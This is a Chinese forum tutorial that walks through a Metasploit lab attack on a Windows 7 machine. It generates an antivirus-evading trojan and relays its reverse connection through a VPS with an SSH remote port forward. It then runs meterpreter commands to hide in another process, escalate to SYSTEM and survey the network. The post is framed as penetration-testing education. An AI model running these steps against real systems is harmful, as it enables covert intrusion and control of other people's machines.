老哥,稳!
vps露点了
Metasploit
0x00. Metasploit Framework简介
Metasploit是目前最流行、最强大、最具扩展性的渗透测试平台软件,是笔者最崇拜也最喜欢的工具没有之一,下面我将用msf给大家带来一场盛大的内网渗透体验,别眨眼噢!
0x01. 实战操作
环境准备:
1. 靶机win 7 IP=192.168.43.150
2. kali linux IP=192.168.43.153
3. VPS服务器 IP=xx.xx.xx.xx
实战演示:
1. 先用evil-evasion生成具有一定免杀功能的windows木马,监听地址设成VPS的地址(打码防D),然后将VPS上的2333端口映射到内网kali的2333端口,同时还要修改VPS上的ssh配置,不然别人是连不上VPS的(在实战中自己常常在内网,所以这里介绍一下VPS)
vi /etc/ssh/sshd_config && GatewayPorts:yes
ssh -CfNg -R xx.xx.xx.xx:2333:192.168.43.153:2333 root@xx.xx.xx.xx -p 29402
2. 启动kali设置msf监听,lport=2333,lhost=192.168.43.153(注意:这里的监听地址是kali的地址,不是VPS的),关于msf的基本操作网上有很多,这里不过多介绍,大家可以参考这个系列文章
[*]如果想要在docker启动持续监听可以用如下命令
set exitonsession false && run -j
3. 在win 7 中执行木马
4. 接收到meterpreter之后就应该将自己的进程迁移到一个隐蔽的进程中去,防止被查杀,这里笔者迁移到win 7的桌面进程
migrate 1988 && getpid
5. 查看当前权限、系统信息,并尝试提权
getuid && sysinfo && getsystem
6. 查看网络、路由信息
ifconfig && route
点击收藏 | 2
关注 | 0